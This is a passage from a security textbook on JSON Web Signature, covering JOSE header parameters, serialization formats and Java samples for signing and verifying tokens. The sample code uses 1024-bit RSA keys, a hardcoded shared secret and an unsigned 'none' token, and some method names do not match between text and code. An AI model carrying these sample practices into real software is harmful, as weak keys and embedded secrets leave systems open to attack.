If you run the code again and again, you may not get the same output as the value of the currentTime variable changes every time you run the program: eyJhbGciOiJub25lIn0.eyJleHAiOjE0MDIwMzcxNDEsInN1YiI6ImpvaG4iLCJuYm YiOjE0MDIwMzY1NDEsImF1ZCI6WyJodHRwczpcL1wvYXBwMS5mb28uY29tIi wiaHR0cHM6XC9cL2FwcDIuZm9vLmNvbSJdLCJpc3MiOiJodHRwczpcL1wvYX ByZXNzLmNvbSIsImp0aSI6IjVmMmQzM2RmLTEyNDktNGIwMS04MmYxLWJl MjliM2NhOTY4OSIsImlhdCI6MTQwMjAzNjU0MX0. The following Java code shows how to parse a base64url-encoded JWT. This code would ideally run at the JWT recipient end: public static PlainJWT parsePlainJWT() throws ParseException { // get JWT in base64url-encoded text. String jwtInText = buildPlainJWT(); // build a plain JWT from the bade64url-encoded text. PlainJWT plainJwt = PlainJWT.parse(jwtInText); // print the JOSE header in JSON. System.out.println(plainJwt.getHeader().toString()); // print JWT body in JSON. System.out.println(plainJwt.getPayload().toString()); return plainJwt; } CHAPTER 7 MESSAgE-LEvEL SECuRITy WITH JSON WEB SIgNATuRE 166 This code produces the following output, which includes the parsed JOSE header and the payload: {"alg":"none"} { "exp":1402038339, "sub":"john", "nbf":1402037739, "aud":["https:\/\/app1.foo.com","https:\/\/app2.foo.com"], "iss":"https:\/\/apress.com", "jti":"1e41881f-7472-4030-8132-856ccf4cbb25", "iat":1402037739 } JOSE WORKING GROUP Many working groups within the IETF work directly with JSON, including the OAuth working group and the System for Cross-domain Identity Management (SCIM) working group. The SCIM working group is building a provisioning standard based on JSON. Outside the IETF, the OASIS XACML working group is working on building a JSON profile for XACML 3.0. The OpenID Connect specification, which is developed under the OpenID Foundation, is also heavily based on JSON. Due to the rise of standards built around JSON and the heavy usage of JSON for data exchange in APIs, it has become absolutely necessary to define how to secure JSON messages at the message level. The use of Transport Layer Security (TLS) only provides confidentiality and integrity at the transport layer. The JOSE working group, formed under the IETF, has the goal of standardizing integrity protection and confidentiality as well as the format for keys and algorithm identifiers to support interoperability of security services for protocols that use JSON. JSON Web Signature (RFC 7515), JSON Web Encryption (RFC 7516), JSON Web Key (RFC 7517), and JSON Web Algorithms (RFC 7518) are four IETF proposed standards, which were developed under the JOSE working group. CHAPTER 7 MESSAgE-LEvEL SECuRITy WITH JSON WEB SIgNATuRE 167 JSON Web Signature (JWS) The JSON Web Signature (JWS) specification, developed under the IETF JOSE working group, represents a message or a payload, which is digitally signed or MACed (when a hashing algorithm is used with HMAC). A signed message can be serialized in two ways by following the JWS specification: the JWS compact serialization and the JWS JSON serialization. The Google OpenID Connect example discussed at the beginning of this chapter uses JWS compact serialization. In fact, the OpenID Connect specification mandates to use JWS compact serialization and JWE compact serialization whenever necessary (we discuss JWE in Chapter 8). The term JWS token is used to refer to the serialized form of a payload, following any of the serialization techniques defined in the JWS specification. 
Note JSON Web Tokens (JWTs) are always serialized with the JWS compact serialization or the JWE compact serialization. We discuss JWE (JSON Web Encryption) in Chapter 8. JWS Compact Serialization JWS compact serialization represents a signed JSON payload as a compact URL-safe string. This compact string has three main elements separated by periods (.): the JOSE header, the JWS payload, and the JWS signature (see Figure 7-1). If you use compact serialization against a JSON payload, then you can have only a single signature, which is computed over the complete JOSE header and JWS payload. JOSE Header The JWS specification introduces 11 parameters to the JOSE header. The following lists out the parameters carried in a JOSE header, which are related to the message Figure 7-1. A JWS token with compact serialization CHAPTER 7 MESSAgE-LEvEL SECuRITy WITH JSON WEB SIgNATuRE 168 signature. Out of all those parameters, the JWT specification only defines the typ and cty parameters (as we discussed before); the rest is defined by the JWS specification. The JOSE header in a JWS token carries all the parameters required by the JWS token recipient to properly validate its signature: • alg (algorithm): The name of the algorithm, which is used to sign the JSON payload. This is a required attribute in the JOSE header. Failure to include this in the header will result in a token parsing error. The value of the alg parameter is a string, which is picked from the JSON Web Signature and Encryption Algorithms registry defined by the JSON Web Algorithms (JWA) specification. If the value of the alg parameter is not picked from the preceding registry, then it should be defined in a collision-resistant manner, but that won’t give any guarantee that the particular algorithm is identified by all JWS implementations. It’s always better to stick to the algorithms defined in the JWA specification. • jku: The jku parameter in the JOSE header carries a URL, which points to a JSON Web Key (JWK) set. This JWK set represents a collection of JSON-encoded public keys, where one of the keys is used to sign the JSON payload. Whatever the protocol used to retrieve the key set should provide the integrity protection. If keys are retrieved over HTTP, then instead of plain HTTP, HTTPS (or HTTP over TLS) should be used. We discuss Transport Layer Security (TLS) in detail in Appendix C. The jku is an optional parameter. • jwk: The jwk parameter in JOSE header represents the public key corresponding to the key that is used to sign the JSON payload. The key is encoded as per the JSON Web Key (JWK) specification. The jku parameter, which we discussed before, points to a link that holds a set of JWKs, while the jwk parameter embeds the key into the JOSE header itself. The jwk is an optional parameter. • kid: The kid parameter of the JOSE header represents an identifier for the key that is used to sign the JSON payload. Using this identifier, the recipient of the JWS should be able locate the key. If the token issuer uses the kid parameter in the JOSE header to let the recipient know about the signing key, then the corresponding key should be CHAPTER 7 MESSAgE-LEvEL SECuRITy WITH JSON WEB SIgNATuRE 169 exchanged “somehow” between the token issuer and the recipient beforehand. How this key exchange happens is out of the scope of the JWS specification. If the value of the kid parameter refers to a JWK, then the value of this parameter should match the value of the kid parameter in the JWK. The kid is an optional parameter in the JOSE header. 
• x5u: The x5u parameter in the JOSE header is very much similar to the jku parameter, which we discussed before. Instead of pointing to a JWK set, the URL here points to an X.509 certificate or a chain of X.509 certificates. The resource pointed by the URL must hold the certificate or the chain of certificates in the PEM- encoded form. Each certificate in the chain must appear between the delimiters4: -----BEGIN CERTIFICATE----- and -----END CERTIFICATE-----. The public key corresponding to the key used to sign the JSON payload should be the very first entry in the certificate chain, and the rest is the certificates of intermediate CAs (certificate authority) and the root CA. The x5u is an optional parameter in the JOSE header. • x5c: The x5c parameter in the JOSE header represents the X.509 certificate (or the certificate chain), which corresponds to the private key, which is used to sign the JSON payload. This is similar to the jwk parameter we discussed before, but in this case, instead of a JWK, it’s an X.509 certificate (or a chain of certificates). The certificate or the certificate chain is represented in a JSON array of certificate value strings. Each element in the array should be a base64-encoded DER PKIX certificate value. The public key corresponding to the key used to sign the JSON payload should be the very first entry in the JSON array, and the rest is the certificates of intermediate CAs (certificate authority) and the root CA. The x5c is an optional parameter in the JOSE header. 4 The Internet IP Security PKI Profile of IKEv1/ISAKMP, IKEv2, and PKIX (RFC 4945) defines the delimiters for X.509 certificates under Section 6.1, https://tools.ietf.org/html/rfc4945 CHAPTER 7 MESSAgE-LEvEL SECuRITy WITH JSON WEB SIgNATuRE 170 • x5t: The x5t parameter in the JOSE header represents the base64url- encoded SHA-1 thumbprint of the X.509 certificate corresponding to the key used to sign the JSON payload. This is similar to the kid parameter we discussed before. Both these parameters are used to locate the key. If the token issuer uses the x5t parameter in the JOSE header to let the recipient know about the signing key, then the corresponding key should be exchanged “somehow” between the token issuer and the recipient beforehand. How this key exchange happens is out of the scope of the JWS specification. The x5t is an optional parameter in the JOSE header. • x5t#s256: The x5t#s256 parameter in the JOSE header represents the base64url-encoded SHA256 thumbprint of the X.509 certificate corresponding to the key used to sign the JSON payload. The only difference between x5t#s256 and the x5t is the hashing algorithm. The x5t#s256 is an optional parameter in the JOSE header. • typ: The typ parameter in the JOSE header is used to define the media type of the complete JWS. There are two types of components that process a JWS: JWS implementations and JWS applications. Nimbus5 is a JWS implementation in Java. The Nimbus library knows how to build and parse a JWS. A JWS application can be anything, which uses JWS internally. A JWS application uses a JWS implementation to build or parse a JWS. In this case, the typ parameter is just another parameter for the JWS implementation. It will not try to interpret the value of it, but the JWS application would. The typ parameter will help JWS applications to differentiate the content when multiple types of objects are present. 
For a JWS token using JWS compact serialization and for a JWE token using JWE compact serialization, the value of the typ parameter is JOSE, and for a JWS token using JWS JSON serialization and for a JWE token using JWE JSON serialization, the value is JOSE+JSON. (JWS serialization is discussed later in this chapter, and JWE serialization is discussed in Chapter 8). The typ is an optional parameter in the JOSE header. 5 Nimbus JWT Java implementation, http://connect2id.com/products/nimbus-jose-jwt CHAPTER 7 MESSAgE-LEvEL SECuRITy WITH JSON WEB SIgNATuRE 171 • cty: The cty parameter in the JOSE header is used to represent the media type of the secured content in the JWS. It is only recommended to use this parameter in the case of a nested JWT. The nested JWT is discussed later in Chapter 8, and the definition of the cty parameter is further explained there. The cty is an optional parameter in the JOSE header. • crit: The crit parameter in the JOSE header is used to indicate the recipient of the JWS that the presence of custom parameters, which neither defined by the JWS or JWA specifications, in the JOSE header. If these custom parameters are not understood by the recipient, then the JWS token will be treated as invalid. The value of the crit parameter is a JSON array of names, where each entry represents a custom parameter. The crit is an optional parameter in the JOSE header. Out of all the 11 parameters defined earlier, 7 talk about how to reference the public key corresponding to the key, which is used to sign the JSON payload. There are three ways of referencing a key: external reference, embedded, and key identifier. The jku and x5u parameters fall under the external reference category. Both of them reference the key through a URI. The jwk and x5c parameters fall under embedded reference category. Each one of them defines how to embed the key to the JOSE header itself. The kid, x5t, and x5t#s256 parameters fall under the key identifier reference category. All three of them define how to locate the key using an identifier. Then again all the seven parameters can further divide into two categories based on the representation of the key: JSON Web Key (JWK) and X.509. The jku, jwk, and kid fall under the JWK category, while x5u, x5c, x5t, and x5t#s256 fall under the X.509 category. In the JOSE header of a given JWS token, at a given time, we only need to have one from the preceding parameters. Note If any of the jku, jwk, kid, x5u, x5c, x5t, and x5t#s256 are present in the JOSE header, those must be integrity protected. Failure to do so will let an attacker modify the key used to sign the message and change the content of the message payload. After validating the signature of a JWS token, the recipient application must check whether the key associated with the signature is trusted. Checking whether the recipient knows the corresponding key can do the trust validation. CHAPTER 7 MESSAgE-LEvEL SECuRITy WITH JSON WEB SIgNATuRE 172 The JWS specification does not restrict applications only to use 11 header parameters defined earlier. There are two ways to introduce new header parameters: public header names and private header names. Any header parameter that is intended to use in the public space should be introduced in a collision-resistant manner. It is recommended to register such public header parameters in the IANA JSON Web Signature and Encryption Header Parameters registry. 
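To make the header parameters discussed above concrete, the following minimal sketch builds a JOSE header with the Nimbus library mentioned earlier in this chapter, advertising the signing algorithm through alg and referencing the signing key through kid. The class name and the key identifier value are purely illustrative, and the exact builder API may differ slightly between Nimbus versions:

import com.nimbusds.jose.JWSAlgorithm;
import com.nimbusds.jose.JWSHeader;

public class JoseHeaderExample {

    public static void main(String[] args) {
        // build a JOSE header that advertises the signing algorithm (alg)
        // and references the signing key through an identifier (kid)
        JWSHeader joseHeader = new JWSHeader.Builder(JWSAlgorithm.RS256)
                .keyID("2014-06-29")
                .build();

        // JSON form of the header, e.g. {"alg":"RS256","kid":"2014-06-29"}
        System.out.println(joseHeader.toString());

        // base64url-encoded form - this is what becomes the first element
        // of a compact-serialized JWS token
        System.out.println(joseHeader.toBase64URL().toString());
    }
}

A recipient reverses this process by base64url-decoding the first element of the token and reading alg and kid from it before validating the signature.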
The private header parameters are mostly used in a restricted environment, where both the token issuer and the recipients are well aware of each other. These parameters should be used with caution, because there is a chance for collision. If a given recipient accepts tokens from multiple token issuers, then the semantics of the same parameter may be different from one issuer to another, if it is a private header. In either case, whether it’s a public or a private header parameter, if it is not defined in the JWS or the JWA specification, the header name should be included in the crit header parameter, which we discussed before. JWS Payload The JWS payload is the message that needs to be signed. The message can be anything— need not be a JSON payload. If it is a JSON payload, then it could contain whitespaces and/or line breaks before or after any JSON value. The second element of the serialized JWS token carries the base64url-encoded value of the JWS payload. JWS Signature The JWS signature is the digital signature or the MAC, which is calculated over the JWS payload and the JOSE header. The third element of the serialized JWS token carries the base64url- encoded value of the JWS signature. The Process of Signing (Compact Serialization) We discussed about all the ingredients that are required to build a JWS token under compact serialization. The following discusses the steps involved in building a JWS token. There are three elements in a JWS token; the first element is produced by step 2, the second element is produced by step 4, and the third element is produced by step 7. CHAPTER 7 MESSAgE-LEvEL SECuRITy WITH JSON WEB SIgNATuRE 173 1. Build a JSON object including all the header parameters, which express the cryptographic properties of the JWS token—this is known as the JOSE header. As discussed before in this chapter, under the section “JOSE Header,” the token issuer should advertise in the JOSE header the public key corresponding to the key used to sign the message. This can be expressed via any of these header parameters: jku, jwk, kid, x5u, x5c, x5t, and x5t#s256. 2. Compute the base64url-encoded value against the UTF-8 encoded JOSE header from step 1 to produce the first element of the JWS token. 3. Construct the payload or the content to be signed—this is known as the JWS payload. The payload is not necessarily JSON—it can be any content. 4. Compute the base64url-encoded value of the JWS payload from step 3 to produce the second element of the JWS token. 5. Build the message to compute the digital signature or the MAC. The message is constructed as ASCII(BASE64URL- ENCODE(UTF8(JOSE Header)) . BASE64URL-ENCODE(JWS Payload)). 6. Compute the signature over the message constructed in step 5, following the signature algorithm defined by the JOSE header parameter alg. The message is signed using the private key corresponding to the public key advertised in the JOSE header. 7. Compute the base64url-encoded value of the JWS signature produced in step 6, which is the third element of the serialized JWS token. 8. Now we have all the elements to build the JWS token in the following manner. The line breaks are introduced only for clarity. BASE64URL(UTF8(JWS Protected Header)). BASE64URL(JWS Payload). BASE64URL(JWS Signature) CHAPTER 7 MESSAgE-LEvEL SECuRITy WITH JSON WEB SIgNATuRE 174 JWS JSON Serialization In contrast to the JWS compact serialization, the JWS JSON serialization can produce multiple signatures over the same JWS payload along with different JOSE header parameters. 
The ultimate serialized form under JWS JSON serialization wraps the signed payload in a JSON object, with all related metadata. This JSON object includes two top-level elements, payload and signatures, and three subelements under the signatures element: protected, header, and signature. The following is an example of a JWS token, which is serialized with JWS JSON serialization. This is neither URL safe nor optimized for compactness. It carries two signatures over the same payload, and each signature and the metadata around it are stored as an element in the JSON array, under the signatures top-level element. Each signature uses a different key to sign, represented by the corresponding kid header parameter. The JSON serialization is also useful in selectively signing JOSE header parameters. In contrast, JWS compact serialization signs the complete JOSE header:

{
  "payload":"eyJpc3MiOiJqb2UiLA0KICJleHAiOjEzMDA4MTkzOD",
  "signatures":[
    {
      "protected":"eyJhbGciOiJSUzI1NiJ9",
      "header":{"kid":"2014-06-29"},
      "signature":"cC4hiUPoj9Eetdgtv3hF80EGrhuB"
    },
    {
      "protected":"eyJhbGciOiJFUzI1NiJ9",
      "header":{"kid":"e909097a-ce81-4036-9562-d21d2992db0d"},
      "signature":"DtEhU3ljbEg8L38VWAfUAqOyKAM"
    }
  ]
}

JWS Payload
The payload top-level element of the JSON object includes the base64url-encoded value of the complete JWS payload. The JWS payload need not necessarily be a JSON payload; it can be of any content type. The payload is a required element in the serialized JWS token.

JWS Protected Header
The JWS Protected Header is a JSON object that includes the header parameters that have to be integrity protected by the signing or MAC algorithm. The protected parameter in the serialized JSON form represents the base64url-encoded value of the JWS Protected Header. The protected parameter is not a top-level element of the serialized JWS token. It is used to define elements in the signatures JSON array and includes the base64url-encoded header elements, which should be signed. If you base64url-decode the value of the first protected element in the preceding code snippet, you will see {"alg":"RS256"}. The protected parameter must be present if there are any protected header parameters. There is one protected element for each entry of the signatures JSON array.

JWS Unprotected Header
The JWS Unprotected Header is a JSON object that includes the header parameters that are not integrity protected by the signing or MAC algorithm. The header parameter in the serialized JSON form carries the JWS Unprotected Header as a plain JSON object; unlike the protected header, it is not base64url-encoded. The header is not a top-level parameter of the JSON object. It is used to define elements in the signatures JSON array. The header parameter includes unprotected header elements related to the corresponding signature, and these elements are not signed. Combining both the protected headers and unprotected headers ultimately derives the JOSE header corresponding to the signature. In the preceding code snippet, the complete JOSE header corresponding to the first entry in the signatures JSON array would be {"alg":"RS256", "kid":"2014-06-29"}. The header element is represented as a JSON object and must be present if there are any unprotected header parameters. There is one header element for each entry of the signatures JSON array.
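The protected and header elements described above can be inspected with nothing more than a base64url decode. The following minimal sketch (plain JDK, no JWS library needed; the class name is illustrative) decodes the protected value of the first signature in the preceding example and prints the integrity-protected portion of its JOSE header:

import java.nio.charset.StandardCharsets;
import java.util.Base64;

public class ProtectedHeaderDecode {

    public static void main(String[] args) {
        // the protected value of the first entry in the signatures array
        // of the preceding JSON-serialized JWS example
        String protectedHeader = "eyJhbGciOiJSUzI1NiJ9";

        // base64url-decode it to reveal the integrity-protected header
        byte[] decoded = Base64.getUrlDecoder().decode(protectedHeader);

        // prints {"alg":"RS256"}
        System.out.println(new String(decoded, StandardCharsets.UTF_8));
    }
}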
JWS Signature The signatures parameter of the JSON object includes an array of JSON objects, where each element includes a signature or MAC (over the JWS payload and JWS protected header) and the associated metadata. This is a required parameter. The signature subelement, which is inside each entry of the signatures array, carries the base64url-encoded value of the signature computed over the protected header elements (represented by the protected parameter) and the JWS payload. Both the signatures and signature are required parameters. CHAPTER 7 MESSAgE-LEvEL SECuRITy WITH JSON WEB SIgNATuRE 176 Note Even though JSON serialization provides a way to selectively sign JOSE header parameters, it does not provide a direct way to selectively sign the parameters in the JWS payload. Both forms of serialization mentioned in the JWS specification sign the complete JWS payload. There is a workaround for this using JSON serialization. you can replicate the payload parameters that need to be signed selectively in the JOSE header. Then with JSON serialization, header parameters can be selectively signed. The Process of Signing (JSON Serialization) We discussed about all the ingredients that are required to build a JWS token under JSON serialization. The following discusses the steps involved in building the JWS token. 1. Construct the payload or the content to be signed—this is known as the JWS payload. The payload is not necessarily JSON—it can be any content. The payload element in the serialized JWS token carries the base64url-encoded value of the content. 2. Decide how many signatures you would need against the payload and for each case which header parameters must be signed and which are not. 3. Build a JSON object including all the header parameters that are to be integrity protected or to be signed. In other words, construct the JWS Protected Header for each signature. The base64url- encoded value of the UTF-8 encoded JWS Protected Header will produce the value of the protected subelement inside the signatures top-level element of the serialized JWS token. 4. Build a JSON object including all the header parameters that need not be integrity protected or not be signed. In other words, construct the JWS Unprotected Header for each signature. This will produce the header subelement inside the signatures top-level element of the serialized JWS token. CHAPTER 7 MESSAgE-LEvEL SECuRITy WITH JSON WEB SIgNATuRE 177 5. Both the JWS Protected Header and the JWS Unprotected Header express the cryptographic properties of the corresponding signature (there can be more than one signature element)— this is known as the JOSE header. As discussed before in this chapter, under the section “JOSE Header,” the token issuer should advertise in the JOSE header the public key corresponding to the key used to sign the message. This can be expressed via any of these header parameters: jku, jwk, kid, x5u, x5c, x5t, and x5t#s256. 6. Build the message to compute the digital signature or the MAC against each entry in the signatures JSON array of the serialized JWS token. The message is constructed as ASCII(BASE64URL- ENCODE(UTF8(JWS Protected Header)). BASE64URL- ENCODE(JWS Payload)). 7. Compute the signature over the message constructed in step 6, following the signature algorithm defined by the header parameter alg. This parameter can be either inside the JWS Protected Header or the JWS Unprotected Header. The message is signed using the private key corresponding to the public key advertised in the header. 8. 
Compute the base64url-encoded value of the JWS signature produced in step 7, which will produce the value of the signature subelement inside the signatures top-level element of the serialized JWS token. 9. Once all the signatures are computed, the signatures top-level element can be constructed and will complete the JWS JSON serialization. SIGNATURE TYPES The XML Signature specification, which was developed under W3C, proposes three types of signatures: enveloping, enveloped, and detached. These three kinds of signatures are only discussed under the context of XML. CHAPTER 7 MESSAgE-LEvEL SECuRITy WITH JSON WEB SIgNATuRE 178 With the enveloping signature, the XML content to be signed is inside the signature itself. That is, inside the <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> element. With the enveloped signature, the signature is inside the XML content to be signed. In other words, the <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> element is inside the parent element of the XML payload to be signed. With the detached signature, there is no parent-child relationship between the XML content to be signed and the corresponding signature. They are detached from each other. For anyone who is familiar with XML Signature, all the signatures defined in the JWS specification can be treated as detached signatures. Note The XML Signature specification by W3C only talks about signing an XML payload. If you have to sign any content, then first you need to embed that within an XML payload and then sign. In contrast, the JWS specification is not just limited to JSON. you can sign any content with JWS without wrapping it inside a JSON payload. GENERATING A JWS TOKEN WITH HMAC-SHA256 WITH A JSON PAYLOAD The following Java code generates a JWS token with HMAC-SHA256. you can download the complete Java sample as a Maven project from https://github.com/apisecurity/ samples/tree/master/ch07/sample02. The method buildHmacSha256SignedJWT() in the code should be invoked by passing a secret value that is used as the shared key to sign. The length of the secret value must be at least 256 bits: public static String buildHmacSha256SignedJSON(String sharedSecretString) throws JOSEException { // build audience restriction list. List<String> aud = new ArrayList<String>(); aud.add("https://app1.foo.com"); aud.add("https://app2.foo.com"); CHAPTER 7 MESSAgE-LEvEL SECuRITy WITH JSON WEB SIgNATuRE 179 Date currentTime = new Date(); // create a claims set. JWTClaimsSet jwtClaims = new JWTClaimsSet.Builder(). // set the value of the issuer. issuer("https://apress.com"). // set the subject value - JWT belongs to // this subject. subject("john"). // set values for audience restriction. audience(aud). // expiration time set to 10 minutes. expirationTime(new Date(new Date().getTime() + 1000 * 60 * 10)). // set the valid from time to current time. notBeforeTime(currentTime). // set issued time to current time. issueTime(currentTime). // set a generated UUID as the JWT // identifier. jwtID(UUID.randomUUID().toString()). build(); // create JWS header with HMAC-SHA256 algorithm. JWSHeader jswHeader = new JWSHeader(JWSAlgorithm.HS256); // create signer with the provider shared secret. JWSSigner signer = new MACSigner(sharedSecretString); // create the signed JWT with the JWS header and the JWT body. SignedJWT signedJWT = new SignedJWT(jswHeader, jwtClaims); // sign the JWT with HMAC-SHA256. signedJWT.sign(signer); // serialize into base64url-encoded text. 
String jwtInText = signedJWT.serialize(); // print the value of the JWT. System.out.println(jwtInText); return jwtInText; } CHAPTER 7 MESSAgE-LEvEL SECuRITy WITH JSON WEB SIgNATuRE 180 To build and run the program, execute the following Maven command from the ch07/ sample02 directory. \> mvn test -Psample02 The preceding code produces the following output, which is a signed JSON payload (a JWS). If you run the code again and again, you may not get the same output as the value of the currentTime variable changes every time you run the program: eyJhbGciOiJIUzI1NiJ9.eyJleHAiOjE0MDIwMzkyOTIsInN1YiI6ImpvaG4iLCJuYm YiOjE0MDIwMzg2OTIsImF1ZCI6WyJodHRwczpcL1wvYXBwMS5mb28uY29tIiw iaHR0cHM6XC9cL2FwcDIuZm9vLmNvbSJdLCJpc3MiOiJodHRwczpcL1wvYXBy ZXNzLmNvbSIsImp0aSI6ImVkNjkwN2YwLWRlOGEtNDMyNi1hZDU2LWE5ZmE 5NjA2YTVhOCIsImlhdCI6MTQwMjAzODY5Mn0.3v_pa-QFCRwoKU0RaP7pLOox T57okVuZMe_A0UcqQ8 The following Java code shows how to validate the signature of a signed JSON message with HMAC-SHA256. To do that, you need to know the shared secret used to sign the JSON payload: public static boolean isValidHmacSha256Signature() throws JOSEException, ParseException { String sharedSecretString = "ea9566bd-590d-4fe2-a441-d5f240050dbc"; // get signed JWT in base64url-encoded text. String jwtInText = buildHmacSha256SignedJWT(sharedSecretString); // create verifier with the provider shared secret. JWSVerifier verifier = new MACVerifier(sharedSecretString); // create the signed JWS token with the base64url-encoded text. SignedJWT signedJWT = SignedJWT.parse(jwtInText); // verify the signature of the JWS token. boolean isValid = signedJWT.verify(verifier); if (isValid) { System.out.println("valid JWT signature"); } else { System.out.println("invalid JWT signature"); } return isValid; } CHAPTER 7 MESSAgE-LEvEL SECuRITy WITH JSON WEB SIgNATuRE 181 GENERATING A JWS TOKEN WITH RSA-SHA256 WITH A JSON PAYLOAD The following Java code generates a JWS token with RSA-SHA256. you can download the complete Java sample as a Maven project from https://github.com/ apisecurity/samples/tree/master/ch07/sample03. First you need to invoke the method generateKeyPair() and pass the PrivateKey(generateKeyPair(). getPrivateKey()) into the method buildRsaSha256SignedJSON(): public static KeyPair generateKeyPair() throws NoSuchAlgorithmException { // instantiate KeyPairGenerate with RSA algorithm. KeyPairGenerator keyGenerator = KeyPairGenerator.getInstance("RSA"); // set the key size to 1024 bits. keyGenerator.initialize(1024); // generate and return private/public key pair. return keyGenerator.genKeyPair(); } public static String buildRsaSha256SignedJSON(PrivateKey privateKey) throws JOSEException { // build audience restriction list. List<String> aud = new ArrayList<String>(); aud.add("https://app1.foo.com"); aud.add("https://app2.foo.com"); Date currentTime = new Date(); // create a claims set. JWTClaimsSet jwtClaims = new JWTClaimsSet.Builder(). // set the value of the issuer. issuer("https://apress.com"). // set the subject value - JWT belongs to // this subject. subject("john"). // set values for audience restriction. audience(aud). // expiration time set to 10 minutes. expirationTime(new Date(new Date().getTime() + 1000 * 60 * 10)). CHAPTER 7 MESSAgE-LEvEL SECuRITy WITH JSON WEB SIgNATuRE 182 // set the valid from time to current time. notBeforeTime(currentTime). // set issued time to current time. issueTime(currentTime). // set a generated UUID as the JWT identifier. jwtID(UUID.randomUUID().toString()). 
build(); // create JWS header with RSA-SHA256 algorithm. JWSHeader jswHeader = new JWSHeader(JWSAlgorithm.RS256); // create signer with the RSA private key.. JWSSigner signer = new RSASSASigner((RSAPrivateKey)privateKey); // create the signed JWT with the JWS header and the JWT body. SignedJWT signedJWT = new SignedJWT(jswHeader, jwtClaims); // sign the JWT with HMAC-SHA256. signedJWT.sign(signer); // serialize into base64-encoded text. String jwtInText = signedJWT.serialize(); // print the value of the JWT. System.out.println(jwtInText); return jwtInText; } The following Java code shows how to invoke the previous two methods: KeyPair keyPair = generateKeyPair(); buildRsaSha256SignedJSON(keyPair.getPrivate()); To build and run the program, execute the following Maven command from the ch07/ sample03 directory. \> mvn test -Psample03 Let’s examine how to validate a JWS token signed by RSA-SHA256. you need to know the PublicKey corresponding to the PrivateKey used to sign the message: public static boolean isValidRsaSha256Signature() throws NoSuchAlgorithmException, JOSEException, ParseException { // generate private/public key pair. CHAPTER 7 MESSAgE-LEvEL SECuRITy WITH JSON WEB SIgNATuRE 183 KeyPair keyPair = generateKeyPair(); // get the private key - used to sign the message. PrivateKey privateKey = keyPair.getPrivate(); // get public key - used to verify the message signature. PublicKey publicKey = keyPair.getPublic(); // get signed JWT in base64url-encoded text. String jwtInText = buildRsaSha256SignedJWT(privateKey); // create verifier with the provider shared secret. JWSVerifier verifier = new RSASSAVerifier((RSAPublicKey) publicKey); // create the signed JWT with the base64url-encoded text. SignedJWT signedJWT = SignedJWT.parse(jwtInText); // verify the signature of the JWT. boolean isValid = signedJWT.verify(verifier); if (isValid) { System.out.println("valid JWT signature"); } else { System.out.println("invalid JWT signature"); } return isValid; } GENERATING A JWS TOKEN WITH HMAC-SHA256 WITH A NON-JSON PAYLOAD The following Java code generates a JWS token with HMAC-SHA256. you can download the complete Java sample as a Maven project from https://github.com/apisecurity/ samples/tree/master/ch07/sample04. The method buildHmacSha256Signed NonJSON() in the code should be invoked by passing a secret value that is used as the shared key to sign. The length of the secret value must be at least 256 bits: public static String buildHmacSha256SignedJWT(String sharedSecretString) throws JOSEException { // create an HMAC-protected JWS object with a non-JSON payload JWSObject jwsObject = new JWSObject(new JWSHeader(JWSAlgorithm.HS256), new Payload("Hello world!")); CHAPTER 7 MESSAgE-LEvEL SECuRITy WITH JSON WEB SIgNATuRE 184 // create JWS header with HMAC-SHA256 algorithm. jwsObject.sign(new MACSigner(sharedSecretString)); // serialize into base64-encoded text. String jwtInText = jwsObject.serialize(); // print the value of the serialzied JWS token. System.out.println(jwtInText); return jwtInText; } To build and run the program, execute the following Maven command from the ch07/ sample04 directory. \> mvn test -Psample04 The preceding code uses the JWS compact serialization and will produce the following output: eyJhbGciOiJIUzI1NiJ9.SGVsbG8gd29ybGQh.zub7JG0FOh7EIKAgWMzx95w-nFpJdRMvUh_ pMwd6wnA Summary • JSON has already become the de facto message exchange format for APIs. • Understanding JSON security plays a key role in securing APIs. 
• JSON Web Token (JWT) defines a container to transport data between interested parties in a cryptographically safe manner. It became an IETF standard in May 2015 with the RFC 7519. • Both JWS (JSON Web Signature) and JWE (JSON Web Encryption) standards are built on top of JWT. • There are two types of serialization techniques defined by the JWS specification: compact serialization and JSON serialization. • The JWS specification is not just limited to JSON. You can sign any content with JWS without wrapping it inside a JSON payload. CHAPTER 7 MESSAgE-LEvEL SECuRITy WITH JSON WEB SIgNATuRE 185 © Prabath Siriwardena 2020 P. Siriwardena, Advanced API Security, https://doi.org/10.1007/978-1-4842-2050-4_8 CHAPTER 8 Message-Level Security with JSON Web Encryption In Chapter 7, we discussed in detail the JWT (JSON Web Token) and JWS (JSON Web Signature) specifications. Both of these specifications are developed under the IETF JOSE working group. This chapter focuses on another prominent standard developed by the same IETF working group for encrypting messages (not necessarily JSON payloads): JSON Web Encryption (JWE). Like in JWS, JWT is the foundation for JWE. The JWE specification standardizes the way to represent an encrypted content in a JSON-based data structure. The JWE1 specification defines two serialized forms to represent the encrypted payload: the JWE compact serialization and JWE JSON serialization. Both of these two serialization techniques are discussed in detail in the sections to follow. Like in JWS, the message to be encrypted using JWE standard need not be a JSON payload, it can be any content. The term JWE token is used to refer to the serialized form of an encrypted message (any message, not just JSON), following any of the serialization techniques defined in the JWE specification. JWE Compact Serialization With the JWE compact serialization, a JWE token is built with five key components, each separated by periods (.): JOSE header, JWE Encrypted Key, JWE Initialization Vector, JWE Ciphertext, and JWE Authentication Tag. Figure 8-1 shows the structure of a JWE token formed by JWE compact serialization. 1 The JSON Web Encryption specification, https://tools.ietf.org/html/rfc7516 186 JOSE Header The JOSE header is the very first element of the JWE token produced under compact serialization. The structure of the JOSE header is the same, as we discussed in Chapter 7, other than few exceptions. The JWE specification introduces two new parameters (enc and zip), which are included in the JOSE header of a JWE token, in addition to those introduced by the JSON Web Signature (JWS) specification. The following lists out all the JOSE header parameters, which are defined by the JWE specification: • alg (algorithm): The name of the algorithm, which is used to encrypt the Content Encryption Key (CEK). The CEK is a symmetric key, which encrypts the plaintext JSON payload. Once the plaintext is encrypted with the CEK, the CEK itself will be encrypted with another key following the algorithm identified by the value of the alg parameter. The encrypted CEK will then be included in the JWE Encrypted Key section of the JWE token. This is a required attribute in the JOSE header. Failure to include this in the header will result in a token parsing error. The value of the alg parameter is a string, which is picked from the JSON Web Signature and Encryption Algorithms registry defined by the JSON Web Algorithms2 (JWA) specification. 
